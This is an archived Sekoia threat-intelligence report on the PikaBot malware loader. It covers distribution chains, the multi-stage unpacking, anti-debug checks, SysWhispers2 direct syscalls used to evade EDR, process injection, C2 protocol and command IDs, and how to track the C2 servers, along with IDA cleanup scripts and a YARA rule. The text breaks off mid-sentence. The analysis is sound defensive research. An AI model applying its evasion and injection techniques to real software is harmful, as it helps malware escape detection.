{
	"id": "17742ad0-eb2a-4472-833b-a30b4cfb5e6a",
	"created_at": "2026-04-06T00:13:20.033643Z",
	"updated_at": "2026-04-10T03:33:30.409144Z",
	"deleted_at": null,
	"sha1_hash": "4f5652518458409da22148a2e2733c558aea9b10",
	"title": "PikaBot: a Guide to its Deep Secrets and Operations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 935216,
	"plain_text": "PikaBot: a Guide to its Deep Secrets and Operations\r\nBy Pierre Le Bourhis,\u0026nbsp;Quentin Bourgue\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2024-06-03 · Archived: 2026-04-05 23:05:31 UTC\r\nBetween 27 and 29 May 2024, international law enforcement agencies and partners conducted the Operation\r\nEndgame to disrupt criminal services, notably through taking down key botnet infrastructures, including those of\r\nIcedID, SystemBC, PikaBot, SmokeLoader and BumbleBee.\r\nThe Sekoia TDR team supported the French law enforcement agencies by providing valuable cyber threat\r\nintelligence, in particular on PikaBot.\r\nTable of contents\r\nIntroduction\r\nContext\r\nEmergence of PikaBot\r\nLarge-scale distribution\r\nInternals of PikaBot\r\nLoader stage 1\r\nJunk code\r\nLoader stage 2\r\nPikaBot core\r\nFinal words\r\nPikaBot C2 infrastructure\r\nProactively tracking PikaBot infrastructure\r\nEvolution over the year\r\nConclusion\r\nIoCs\r\nAnnexes\r\nAnnex 1 – Short campaign analysis\r\nAnnex 2 – List of banned process\r\nMITRE ATT\u0026CK TTPs\r\nExternal references\r\nIntroduction\r\nPikaBot is a malware loader, widely distributed since February 2023, that is used by Initial Access Brokers\r\n(IABs) to establish an initial foothold within a victim’s networks and to distribute additional payloads such as\r\nCobalt Strike and Meterpreter. Furthermore, several sources reported that successful PikaBot compromises led to\r\nthe deployment of the Black Basta ransomware\r\n12\r\n.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 1 of 38\n\nTechnical analysis shared in open source revealed close ties between PikaBot and other infamous malware\r\nfamilies, suggesting possible affiliation between their developers and operators. Specifically, PikaBot shares code\r\nsimilarities with Matanbuchus regarding traffic and string encryption, while its TLS certificate pattern for\r\nCommand \u0026 Control (C2) infrastructure is similar to the Qakbot one.\r\nSince its emergence in early 2023, PikaBot appears to be in active development, with a new major version\r\nreleased in February 2024. The malware employs advanced anti-analysis techniques to evade detection and harden\r\nanalysis, including system checks, indirect syscalls, encryption of next-stage and strings, and dynamic API\r\nresolution. The Sekoia Threat Detection \u0026 Research (TDR) team also identified multiple changes in the PikaBot\r\nC2 infrastructure throughout 2023.\r\nThis article provides an in-depth analysis of PikaBot, focusing on its anti-analysis techniques implemented in the\r\ndifferent malware stages. Additionally, this report shares technical details on PikaBot C2 infrastructure.\r\nContext\r\nEmergence of PikaBot\r\nIn February 2023, PikaBot was first observed being distributed through a thread-hijacking phishing campaign by\r\nthe IAB group TA5773. The infection chain involved a OneNote file attached to a thread-hijacked email, which\r\nran a CMD script to download and execute a PikaBot DLL.\r\nAt that time, the TA577 intrusion set was known for widely distributing Qakbot using similar techniques. Some\r\ncybersecurity researchers initially speculated that the malware might be Matanbuchus, due to the similarities in C2\r\ntraffic. Further analysis revealed that the samples belonged to a new malware family. It was later named “PikaBot”\r\nbecause of the string “iPikaBot” found on an HTML page of the C2 servers4.\r\nIn August 2023, law enforcement agencies conducted a takedown of the Qakbot infrastructure. As a result of this\r\noperation and starting from September 2023, TA577 – one of Qakbot’s largest affiliates allegedly using AA, BB\r\nand TR botnets – switched to distributing other botnets, PikaBot being one of them. Since then, TA577’s phishing\r\ncampaigns mainly distributed PikaBot in large-scale operations.\r\nLarge-scale distribution\r\nBetween February 2023 and April 2024, PikaBot was primarily spread by TA577 through emails embedding\r\ndownload URLs within the body or as attachments. Clicking on these URLs directed users to download, and then\r\nto execute files aimed at deploying PikaBot through various infection chains.\r\nThese execution chains included5:\r\nOneNote file \u003e CMD script \u003e DLL\r\nJavaScript \u003e PowerShell \u003e DLL  \r\nZIP \u003e LNK \u003e CMD \u003e DLL  \r\nZIP \u003e JavaScript \u003e DLL\r\nZIP \u003e JavaScript \u003e CMD \u003e DLL\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 2 of 38\n\nHTML smuggling \u003e ZIP \u003e JavaScript \u003e CMD \u003e DLL\r\nREV \u003e CMD script \u003e CMD \u003e DLL\r\nZIP \u003e JavaScript \u003e CMD \u003e PowerShell \u003e DLL\r\nZIP \u003e HTA \u003e EXE\r\nJavaScript \u003e CMD \u003e DLL\r\nZIP \u003e IMG \u003e LNK \u003e DLL\r\nZIP \u003e MSI \u003e DLL\r\nZIP \u003e JavaScript \u003e PowerShell \u003e EXE\r\nZIP \u003e JavaScript \u003e CMD \u003e EXE\r\nZIP \u003e JAR \u003e DLL\r\nXLS \u003e JavaScript \u003e DLL\r\nZIP \u003e XLS \u003e JavaScript \u003e DLL\r\nZIP \u003e SMB share \u003e EXE\r\nISO \u003e EXE \u003e DLL \u003e CMD \u003e DLL\r\nIn December 2023, PikaBot was also distributed via malvertising. A Google Ads campaign promoted a malicious\r\nwebsite impersonating AnyDesk, which led to the download of a signed MSI installer, which, upon execution,\r\nturned out to be PikaBot6.\r\nThese phishing campaigns aimed at spreading PikaBot at large-scale in order to infect a significant number of\r\nvictims and reach as many hosts as possible in valuable organisations.\r\nInternals of PikaBot\r\nPikaBot is a malware composed of three stages, each stage being a DLL. To isolate them and facilitate their\r\nanalysis, we use the tool dll_to_exe to debug each stage independently.\r\nThe version of PikaBot we analysed is 1.8.32-beta. At first, the sample that triggered our PikaBot analysis was\r\n“PERFERENDISF.jar” (SHA-1: 959da0fb174a8e4db238d08a3f5076a2f43c0f25).\r\nLoader stage 1\r\nThe initial stage of PikaBot functions as a PE unpacker and the subsequent stages are deobfuscated using XOR\r\noperations. These operations employ various keys, which are stored in cleartext within the PE. The next stage is\r\nmeticulously reconstructed in memory through a specific process.\r\nTo prevent direct references to well-known functions from standard libraries, such as Kernel32.dll and User32.dll,\r\nthe malware uses dynamic API imports. The following pseudocode illustrates the use of dynamic API resolution,\r\nas well as a part of the PE deobfuscation and reconstruction process.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 3 of 38\n\nFigure 1. Extract of the function used to deobfuscate the Stage 2\r\nIn the Figure 1, “ptr_1” represents a memory page with both read and write permissions, responsible for handling\r\nthe PE headers. As for “ptr_2”, it has read, write, and execute permissions, as it manages the .text section. PikaBot\r\nrequires this permission because the PE is not written to the disk; instead, it uses reflective code loading to\r\nexecute the second stage directly in memory.\r\nDuring the analysis, the reconstruction of stage 2 is carried out step-by-step:\r\n1. Allocate PE headers;\r\n2. Deobfuscate the DOS header;\r\n3. Deobfuscate and copy the PE sections;\r\n4. Fix .reloc section;\r\n5. Fix import table.\r\nThe malware must fix its imports and relocations tables for several reasons. Primarily, the ‘reloc’ fix is necessary\r\nbecause, in the next stage, PikaBot utilises some hard-coded addresses to establish the direct syscall mechanism.\r\nAs explained in the article A dive into the PE file format – PE file structure – Part 6: PE Base Relocations, the\r\n.reloc section contains a Data Directory that separates blocks, each block representing the base relocations for a\r\n4K page. Every block begins with an IMAGE_BASE_RELOCATION structure:\r\ntypedef struct _IMAGE_BASE_RELOCATION {\r\n DWORD VirtualAddress;\r\n DWORD SizeOfBlock;\r\n} IMAGE_BASE_RELOCATION;\r\nA quick and straightforward method to obtain the second stage of the loader, with all sections properly\r\ndeobfuscated and fixed (e.g. .reloc, .idata), is to set a breakpoint in a debugger at the end of the main function, just\r\nbefore the next stage is executed, and then to dump the memory section. At this stage, no environment detection or\r\nanti-debugging techniques are involved.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 4 of 38\n\nFigure 2. PikaBot stage 2 headers correctly dumped\r\nJunk code\r\nBefore delving into the analysis of PikaBot’s next stages, it is necessary to introduce the integrated junk code.\r\nIndeed, PikaBot incorporates a significant amount of junk code in the next stages, including calls to useless\r\nfunctions (see Figure 3) and to pointless Windows functions. Additionally, the malware contains many\r\nunnecessary boolean expressions. Calls to garbage functions and use of useless boolean expressions are\r\nfrequently intermingled with meaningless loops.\r\nFigure 3. Example of a decompiled junk function\r\nTo save time during our analysis, we used two scripts to clean up the code. The first script maintains a list of\r\nuseless functions and searches for cross references to these functions in the code to remove them. The following is\r\na snippet of the code used for this purpose:\r\nimport ida_bytes\r\ndef remove_junk_call(addressFunctionsToNOP):\r\n for elt in addressFunctionsToNOP:\r\n for ref in CodeRefsTo(elt, 1):\r\n ida_bytes.patch_bytes(ref, b\"\\x90\"*(5))\r\n \r\nremove_junk_call([\"0xuseless_fnc1\", \"0xuseless_fnc2\",])\r\nBy implementing the second script, we identified that PikaBot adds numerous boolean expressions. With the aim\r\nof preventing decompilers optimizations, the malware incorporates the use of global variables in the boolean\r\nexpressions, subsequently avoiding being optimised and removed. It is noteworthy that all the pointless global\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 5 of 38\n\nvariables are located in the same location at the end of the “.data” section (these variables are coloured in red in\r\nthe figure below). \r\nFigure 4. The global variables used in the pointless boolean expressions are in the red square\r\nWhile this script is still a work in progress, it undoubtedly provides valuable assistance in sanitising the PikaBot\r\ncode. The script attempts to identify code with a boolean expression (“xor”, “sub”, “add”, “imul”, “or”) that refers\r\nto a variable located in the area we identify and then cleans each operation refering to it.\r\nimport idautils\r\nimport ida_bytes\r\nimport ida_allins\r\ndword_start: int = 0x0410B80 # replace by the start address of the area (red square)\r\ndword_end: int = 0x04110C4 # replace by the end address of the area (red square)\r\ndef addr_in_trash_range(addr: int) -\u003e bool:\r\n return True if addr \u003e= dword_start and addr \u003c= dword_end else False\r\ndef nop(addr: int, length: int) -\u003e None:\r\n ida_bytes.patch_bytes(addr, b\"\\x90\" * (length))\r\ndef func_cleaner(ea):\r\n prev_reg = None\r\n func = ida_funcs.get_func(ea)\r\n for _ea in Heads(func.start_ea, func.end_ea - 0x1):\r\n insn = idaapi.insn_t()\r\n length = idaapi.decode_insn(insn, _ea)\r\n if insn.get_canon_mnem() in [\"xor\", \"sub\", \"imul\", \"add\", \"or\"]:\r\n if addr_in_trash_range(insn.Op1.addr) or addr_in_trash_range(insn.Op2.addr):\r\n nop(_ea, length)\r\n if prev_reg is not None:\r\n if (\r\n prev_reg == idc.print_operand(_ea, 0)\r\n and idc.print_operand(_ea, 0) != idc.print_operand(_ea, 1)\r\n and \"[\" not in idc.print_operand(_ea, 1)\r\n and insn.Op2.value \u003e 0xFFFF\r\n ):\r\n prev_reg = None\r\n if insn.get_canon_mnem() == \"imul\":\r\n if addr_in_trash_range(insn.ops[1].addr) or addr_in_trash_range(\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 6 of 38\n\ninsn.ops[2].addr\r\n ):\r\n nop(_ea, length)\r\n if prev_reg is not None:\r\n if (\r\n prev_reg == idc.print_operand(_ea, 0)\r\n and idc.print_operand(_ea, 0) != idc.print_operand(_ea, 1)\r\n and \"[\" not in idc.print_operand(_ea, 1)\r\n and insn.Op2.value \u003e 0xFFFF\r\n ):\r\n prev_reg = None\r\n if insn.itype == ida_allins.NN_mov:\r\n # case mov dword_X, eax\r\n if addr_in_trash_range(insn.Op1.addr):\r\n # in range of the trash DWORD_X\r\n nop(_ea, length)\r\n if insn.Op1.type == ida_ua.o_reg and insn.Op2.type == ida_ua.o_mem:\r\n if addr_in_trash_range(insn.Op2.addr):\r\n prev_reg = idc.print_operand(_ea, 0)\r\n # in range of the trash DWORD_X\r\n nop(_ea, length)\r\ndef clean_all_functions():\r\n for func_ea in idautils.Functions(): # Iterate over all functions\r\n func_cleaner(func_ea)\r\nLoader stage 2\r\nThe second stage of the loader involves string obfuscation, environment detection, and anti-debugging techniques.\r\nThe objective of this stage is to halt the malware execution under specific conditions, such as the detection of\r\ndebuggers or network and system analysis tools. After passing all the checks the loader deobfuscates the final\r\nstage and executes it.\r\nThe code of this stage is articulated around a central C structure that contains pointers to required API functions\r\nand pointers to the next stage buffer. Our version of the structure is as follows:\r\nstruct PIKABOT_stage2_core {\r\n _DWORD debug_flag;\r\n _DWORD LdrLoadDLL;\r\n _DWORD LdrGetProcedureAddress;\r\n _DWORD RtlAllocateHeap;\r\n unsigned __int8 (__stdcall *RtlFreeHeap)(void *, _DWORD, int);\r\n _DWORD RtlDecompressBuffer;\r\n _DWORD RtlCreateProcessParametersEx;\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 7 of 38\n\n_DWORD RtlDestroyProcessParameters;\r\n _DWORD ExitProcess;\r\n void (__stdcall *CheckRemoteDebuggerPresent)(int, int *);\r\n int (__stdcall *VirtualAlloc)(int, int, int, int);\r\n unsigned int (__stdcall *GetThreadContext)(int, _DWORD *);\r\n void (__stdcall *VirtualFree)(_DWORD *, _DWORD, int);\r\n int (__stdcall *CreateToolhelp32Snapshot)(int, _DWORD);\r\n int (__stdcall *Process32FirstW)(int, int *);\r\n unsigned int (__stdcall *Process32NextW)(int, int *);\r\n _DWORD ntdll_base_address;\r\n _DWORD kernel32_base_addr;\r\n int unknown0;\r\n int* ptr_next_stage;\r\n int size_next_stage;\r\n _TEB *TEB;\r\n};\r\nEnvironment detection \u0026 anti-debug\r\nPikaBot attempts to detect an attached debugger by reading the debug registers, which can be accessed from the\r\nthread context using the GetThreadContext from Kernel32.dll. As described in the Check Point’s anti-debug cheat\r\nsheet, non-zero values in any of these registers may indicate that a debugger is attached.\r\nFigure 5. PikaBot checking non-zero values in all debug registers\r\nPikaBot stage 2 comes with numerous environment checks using a list of banned processes, their names being\r\nencrypted using RC4. In the figure 6, we provide processes that PikaBot attempts to detect, with each name\r\nsequence encrypted with a separate RC4 key.\r\nThe malware captures a snapshot of the running processes and checks if any of them are present on its ban list.\r\nPikaBot utilises the conventional method to obtain and iterate over running processes, which involves using the\r\nfollowing three Windows functions: CreateToolhelp32Snapshot, Process32First, and Process32Next. If a banned\r\nprocess is detected, the malware sets the first member of its core structure to ‘true’ and subsequently terminates its\r\nexecution. The list of banned process names is provided in Annex 2.\r\nNext stage execution\r\nAfter performing the environment detection, the loader decrypts the next stage. To remain stealthy, PikaBot\r\ndivides the next stage into chunks of data (in this campaign fourteen chunks). Each chunk is RC4 encrypted with\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 8 of 38\n\na unique key and stored in base64 format in the DLL. Additionally, the key used to decrypt each chunk is also\r\nencrypted with a unique RC4 key.\r\nFigure 6. RC4 key decryption to get the RC4 key to decrypt the subsequent stage chunk\r\nThe RC4 key used to decrypt the subsequent stage chunk is embedded within other random strings. As previously\r\nmentioned, PikaBot incorporates a significant amount of garbage code, including calls to superfluous API\r\nfunctions and fake functions designed to waste analysts’ time and mislead EDRs.\r\nBecause of the junk code and the way PikaBot decrypts the next stage chunks, we automated the process of\r\ngetting the RC4 keys and the address of the obfuscated chunks. The mnemonics employed to construct the RC4\r\nkey for the chunk can be identified using the following YARA signature:\r\nrule PikaBot_intermediate_rc4_key {\r\n meta:\r\n author='Sekoia'\r\n strings:\r\n $qmemcopy = {\r\n 8D BD ?? ?? ?? ?? // lea edi, []\r\n BE ?? ?? ?? ?? // mov esi, offset \u003cencypted key\u003e\r\n 53 // push ebx\r\n 81 EC ?? ?? 00 00 // sub esp, \u003csize of the data\u003e\r\n }\r\n \r\n $load_str = {\r\n F3 A? // rep movsb\r\n 8D BD ?? ?? ?? ?? // lea edi, [ebp + local var]\r\n BE DD ?? ?? ?? // mov esi, offset \u003caddr of a string\u003e\r\n B9 ?? 00 00 00 // mov ecx, \u003csize of the data\u003e\r\n F3 A? // rep movsb\r\n }\r\n $mov_ptr_dword = {\r\n C7 85 ?? ?? ?? ?? ?? ?? // mov dword ptr [ebp + local var], \u003cstring value\u003e\r\n ?? ??\r\n F3 A? // rep movsb\r\n }\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 9 of 38\n\ncondition: $qmemcopy and ($load_str or $mov_ptr_dword)\r\n}\r\nWith the matches of the above YARA rule, we obtain the addresses of the functions that decrypt the next stage\r\nchunks. After removing the junk code, the function responsible for building the RC4 key and calling the base64\r\ndecoding and RC4 decryption function on the corresponding chunk is as follows:\r\nFigure 7. Cleaned decompiled code used to build the RC4 key and call the decoding and decryption\r\nroutine\r\nFigure 8. Last stage chunk RC4 decryption with CyberChef\r\nOnce all the blobs comprising the core of PikaBot (next-stage) are decrypted, the current stage uses\r\nRtlCreateProcessParameterEx and RtlCreateProcess to prepare a new process to host the PikaBot core DLL. It\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 10 of 38\n\ninitiates the next stage using “ctfmon.exe -p 1234” in a new process. At this point, the process (ctfmon.exe) that\r\nwill host the PikaBot core remains in a unstarted state, and the decrypted next stage resides solely in the stage 2\r\nmemory area\r\nBefore executing the malware’s final stage, PikaBot allocates memory within the host process. It designates\r\nmemory space to contain valid PE headers, and we observe a comprehensive process of rebuilding the DOS, NT\r\nheaders. Subsequently, each section of the next stage is allocated and copied into the host process.\r\nN.B.: In Figure 9, the decrypted chunk contains the PE header along with some additional or missing bytes,\r\nresulting from the RtlCompression. Each chunk undergoes decompression via the RtlDecompressBuffer Windows\r\nAPI function before being copied into the host process.\r\nSince February 2024, the latest version of PikaBot seeks to evade detection by incorporating a new technique:\r\nthe use of the SysWhispers2. By employing direct syscalls, the malware attempts to bypass Endpoint Detection\r\nand Response (EDR) solutions that use hooks in the ntdll.dll API in userland. Further information and details on\r\nthis technique are discussed in the Outflank article: Red Team Tactics: Combining Direct System Calls and sRDI\r\nto bypass AV/EDR.\r\nSysWhisper2 relies on two structures: “_SW2_SYSCALL_ENTRY” and “_SW2_SYSCALL_LIST”\r\nstruct _SW2_SYSCALL_ENTRY\r\n{\r\n DWORD Hash;\r\n DWORD Address;\r\n}\r\nstruct _SW2_SYSCALL_LIST\r\n{\r\n DWORD Count;\r\n SW2_SYSCALL_ENTRY Entries[SW2_MAX_ENTRIES];\r\n}\r\nThe ‘_SW2_SYSCALL_ENTRY’ establishes a correspondence between a hash and an address in ntdll, where the\r\naddress is close to the syscall execution (see Figure 9). The ‘_SW2_SYSCALL_LIST’ stores each entry. This\r\nstructure is used to invoke a direct syscall by accessing its corresponding hash, effectively creating a gateway\r\nbetween the malware and the direct syscall address. The technique, along with the method for identifying which\r\nsyscall corresponds to which hash, is detailed in this article. \r\nPikaBot implemented a wrapper (Figure 9) saving the return address, where the program must return after making\r\nthe direct syscall. The wrapper is also responsible for retrieving the address in ntdll (see Figure 10 ) for a given\r\nhash and then making the direct call.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 11 of 38\n\nFigure 9. Decompiled version of the SysWhispers2 wrapper function used by PikaBot\r\nFigure 10. Example of address in ntdll present in the SysWhispers list entries\r\nIn this sample of PikaBot, the following direct syscalls are used:\r\nZwReadVirtualMemory NtFreeVirtualMemory NtAllocateVirtualMemory\r\nZwSystemDebugControl ZwQueryInformationProcess NtGetContextThread\r\nZwClose NtOpenProcess ZwFreeVirtualMemory\r\nNtClose NtQuerySystemInformation ZwWriteVirtualMemory\r\nZwResumeThread ZwOpenProcess ZwQuerySystemInformation\r\nNtResumeThread NtCreateUserProcess NtReadVirtualMemory\r\nZwSetContextThread NtQueryInformationProcess NtWriteVirtualMemory\r\nNtSetContextThread NtSystemDebugControl ZwAllocateVirtualMemory\r\nZwCreateUserProcess ZwGetContextThread\r\nTable 1. List of direct syscall present in PikaBot stage 2\r\nThe execution of the final stage is accomplished through the thread hijacking technique. Stage 2 creates a thread\r\nwith an entry point specified in the PE ‘OptionalHeader-\u003eAddressOfEntryPoint,’ which was previously set by the\r\ncurrent stage. We share the pseudo-valid C code of the function responsible for setting up and executing the last\r\nstage at the following URL. Ultimately, the function configures the thread context to resume the pending thread\r\nand execute PikaBot’s final stage.\r\nPikaBot core\r\nA swift examination of the code reveals a substantial structure used throughout the entire execution of the stage.\r\nThe primary function of the PikaBot core is to initially construct this structure. The construction process involves\r\nimporting the necessary DLLs, dynamically resolving API functions from the loaded DLLs, and parsing the\r\nconfiguration stored in cleartext within the PE to assign values such as User-Agent, C2 IP address, and C2 URL to\r\nthe structure members.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 12 of 38\n\nOnce the structure is established, the malware performs host fingerprinting, which is then sent to the C2.\r\nSubsequently, the bot enters into the listening order state, where it awaits new orders to execute on the infected\r\nhost by beaconing its C2 for this new order. The next section is dedicated to the malware communication with its\r\nC2 that gives comprehensive data.\r\nIn this phase, the malware employs an uncommon technique to dynamically resolve APIs. First, it loads the DLL\r\nto acquire a handle to it, then it uses the LdrGetProcedureAddress function from ntdll to assign the address of the\r\nloaded function to one of the malware structure members.\r\nLdrGetProcedureAddress(\r\n IN HMODULEModuleHandle,\r\n IN PANSI_STRINGFunctionName OPTIONAL,\r\n IN WORDOridinal OPTIONAL,\r\n OUT PVOID*FunctionAddress\r\n);\r\nAs presented in the Zscaler article7, the function to resolve the function hash is as follows :\r\ndef hash_pika(api_name: bytes, seed: int = 0x2329) -\u003e int:\r\n checksum = seed\r\n for c in api_name:\r\n if c \u003e 0x60:\r\n c -= 0x20\r\n checksum = (c + (0x21 * checksum)) \u0026 0xffffffff\r\n print(f\"{api_name.decode()} -\u003e 0x{checksum:x}\")\r\n return checksum\r\nHowever, during the analysis of the dynamic API imports, we observed that the custom algorithm has a unique\r\nseed per sample, in Zscaler analysis, the seed is 0x113b and in the current sample the seed is 0x2329. \r\nInterestingly, PikaBot checks the default language of the infected host only at the third stage of its execution. The\r\nlist of countries has been updated; only Ukraine and Russia are filtered, whereas in previous versions, more\r\ncountries from the CIS were filtered: Georgia, Kazakhstan,Tajikistan, Russia, Ukraine, and Belarus.\r\nWhereafter, to avoid re-infecting the same host, the bot creates a mutex.\r\nFigure 11. Creation and verification of a Mutex\r\nC2 communication\r\nThe malware communicates with its command-and-control (C2) server over HTTP using raw data in the body of\r\nPOST requests. Each PikaBot sample has a list of C2 IP addresses, and the malware selects one until it receives a\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 13 of 38\n\nresponse to the initial payload (registering the bot with its ID and the victim’s information). The malware\r\nrandomly chooses the URL used to send data from a list of available URLs stored in its configuration. The data is\r\nRC4 encrypted, and the key used for communication is sent to the C2 server in a request with the following\r\nformat:\r\nThe first 16 bytes contain the configuration;\r\nThe next 32 bytes contain the RC4 key generated by the bot;\r\nThe remainder of the message is the data encrypted with the previous 32 bytes (RC4 key).\r\nAs mentioned in the Elastic Security Lab report, the developer(s) introduced a bytes shifting operation required\r\nbefore decrypting the payload. The number of bytes (“shifted size” in figure 12) to be moved from the end of the\r\nencrypted message to the start is defined at offset 0x16 of the HTTP payload located in the “bot config” in figure\r\n12. Sekoia.io provides a script to decrypt the network communication that is available on this gist.\r\nFigure 12. HTTP POST data message structure\r\nIn the example below (Figure 13), the Python script takes as input all the POST data from a network capture that\r\nis filtered out by tshark (“-Tfields -e data.data”).\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 14 of 38\n\nFigure 13. Output of the Python script used to decrypt the communication from a network capture.\r\nThe initial message transmitted to the C2 server encompasses the bot configuration, including the ID, key, and\r\nstream, as well as the fingerprint of the infected machine. The fingerprinted data remains consistent with the\r\nprevious version, comprising the OS, username, hostname, CPU architecture, display adapter, information\r\nregarding a potential connection to a domain, and the list of running processes.\r\nFinally, after verifying that a C2 is available, PikaBot defines eleven tasks. Each task is identified by a unique\r\ncommand number:\r\n0x1fed: update beacon;\r\n0x1a5a: kill the bot;\r\n0x2672: undetermined purpose command;\r\n0xacb: execute command;\r\n0x36c: download and inject a PE into another remote process;\r\n0x792: download and inject a shellcode into another remote process;\r\n0x359, 0x3a6, 0x240: execute a command;\r\n0x985: enumerate running processes.\r\nEach time the malware received a response from the C2, it check this task ID to execute the corresponding\r\nfunction, see figure 14 below:\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 15 of 38\n\nFigure 14. PikaBot Action Identifier and state machine\r\nPS: To help the understanding of the “state machine”, the following structure were used:\r\nstruct PIKABOT_ACTION\r\n{\r\n int identifier;\r\n int (__cdecl *callback)(int *);\r\n};\r\nstruct PIKABOT_ACTIONS_LIST\r\n{\r\n PIKABOT_ACTION Actions[12];\r\n};\r\nFinal words\r\nPikaBot version 1.8.32-beta continues to be a complex and sophisticated piece of malware, with its multi-stage\r\narchitecture and advanced functionalities. The recent updates to the malware have further enhanced its\r\ncapabilities, making it even more challenging to detect and mitigate. The removal of AES encryption and the\r\nJSON message format is indicative of the malware authors’ indication of an update of the C2 server code too, to\r\nbe able to handle new message structure and obfuscation.Moreover, the incorporation of SysWhisper in stage 2\r\nand the core DLL, as well as the addition of a significant amount of junk code, demonstrates their sophistication\r\nand determination to stay ahead of the curve.\r\nPikaBot C2 infrastructure\r\nSince its emergence in February 2023, Sekoia.io analysts have been tracking the PikaBot C2 servers using various\r\nmethodologies, including proactive heuristic searches on internet scan engines and extraction of malware\r\nconfigurations. We share all collected PikaBot C2 servers and their initial detection dates in the IoCs section.\r\nProactively tracking PikaBot infrastructure\r\nSince the beginning, PikaBot C2 servers have been Nginx servers exposed to IP addresses, primarily on non-standard ports (e.g. 1194, 2078, 2083 or 2222).\r\nThe server TLS certificates have changed over time, transitioning from certificates impersonating brands to\r\npseudo-randomly generated ones.\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 16 of 38\n\nSekoia analysts have continuously monitored the evolution of the PikaBot C2 infrastructure and updated our\r\nheuristics, enabling us to proactively collect C2 IP addresses.\r\nTLS certificates impersonating Slack\r\nIn early February 2023, when PikaBot was discovered, the C2 used a TLS certificate impersonating a Slack\r\nserver:\r\nC=US, ST=CA, O=Slack Technologies Inc, OU=DigiCert Inc, CN=slack.com\r\nOf note, the HTTP response was a default 404 response from an Nginx server:\r\n HTTP/1.1 404 Not Found\r\n Server: nginx/1.18.0 (Ubuntu)\r\n Date: \u003cREDACTED\u003e\r\n Content-Type: text/html\r\n Content-Length: 564\r\n Connection: keep-alive\r\nBy correlating the TLS certificate with the HTTP response, it results in a server footprint consistent with that of\r\nPikaBot C2 servers.\r\nHTML pages impersonating technology brands\r\nBetween the end of February 2023 and May 2023, the PikaBot C2 servers impersonated multiple technology\r\nbrands, with HTTP requests to the root URL returning copies of the impersonated website.\r\nDuring May 2023, we regularly identified changes of the impersonated software on a weekly basis. The\r\nimpersonated brands included Slack, Discord, Flock, Zoho, Fleep, Fortinet and Twilio. The following are the title\r\nof the HTML response of PikaBot C2 servers:\r\n“Discord | Your Place to Talk and Hang Out”\r\n“Fleep – An ideal way to communicate”\r\n“Team Messenger \u0026 Online Collaboration Platform – Flock”\r\n“Slack is your productivity platform | Slack”\r\n“Global Leader of Cybersecurity Solutions and Services | Fortinet”\r\n“Zoho | Conjunto de software en la nube para empresas”\r\nDuring this period, the TLS certificates used by the PikaBot C2 servers were generated pseudo-randomly. We\r\nassess with high confidence that the TLS certificate was built as follows:\r\nCountry (C): a randomly selected country code from a list;\r\nState or province (ST): a randomly selected province code from a list of major-case two-letters code;\r\nOrganisation (O): a generated string using one or two words randomly selected from a list, optionally\r\nending with “Inc.” or “LLC.”;\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 17 of 38\n\nOrganisational unit (OU): a generated string using one or two words randomly selected from a list;\r\nLocation (L): a generated string using one or two words randomly selected from a list;\r\nCommon name (CN): a generated domain name possibly using a combination of words, concatenated with\r\na generic top-level domain (gTLD).\r\nThe following are examples of distinguished names of TLS certificates used by PikaBot C2 servers in May 2023:\r\nC=NZ, ST=UN, O=Anaudia Aquose Inc., OU=Halutz, L=Priorship, CN=lordless[.]name\r\nC=AE, ST=BE, O=Fumosity Inc., OU=Abattised, L=Heptatonic Gallinazo, CN=resonancessewars[.]tires\r\nC=AR, ST=QU, O=Grizzles Nonabrogable Inc., OU=Holohedral Croftland, L=Rehoused Functionaries,\r\nCN=alkaliesnonperspective[.]fish\r\nC=FR, ST=LE, O=Breekless, OU=Athwart, L=Pathed, CN=demonising[.]li\r\nC=GL, ST=LE, O=Speciology, OU=Mezquit, L=Acetylizer Unprayerful, CN=callipersoutane[.]com\r\nNoteworthy, these patterns of distinguished names are quite similar to those used by Qakbot C2 servers.\r\nWhile impersonating well-known technology brands may aim to deceive possible investigation of\r\ncommunications to the C2 servers, TDR analysts believe this behavior makes tracking and detection C2 servers\r\nmuch easier, compared to using default responses. We assess that the PikaBot operator regularly changed the\r\nimpersonated brands to evade detection from cybersecurity vendors, and eventually realised that this\r\nmasquerading technique was not effective.\r\nPseudo-random generated certificates\r\nIn November 2023, we observed that the PikaBot operator(s) ceased impersonating legitimate websites and\r\nreverted to using default server responses instead. They have not modified the generation of TLS certificates used\r\nby PikaBot C2 servers. As a result, we updated our tracking heuristics to rely on TLS certificates, the HTTP\r\nheaders and the JARM value, which has remained unchanged since at least May 2023:\r\n21d19d00021d21d21c21d19d21d21dd188f9fdeea4d1b361be3a6ec494b2d2.\r\nTo identity PikaBot C2 servers, TDR employs the following query based on the JARM, a regular expression of the\r\nTLS distinguished name and the value of the HTTP header 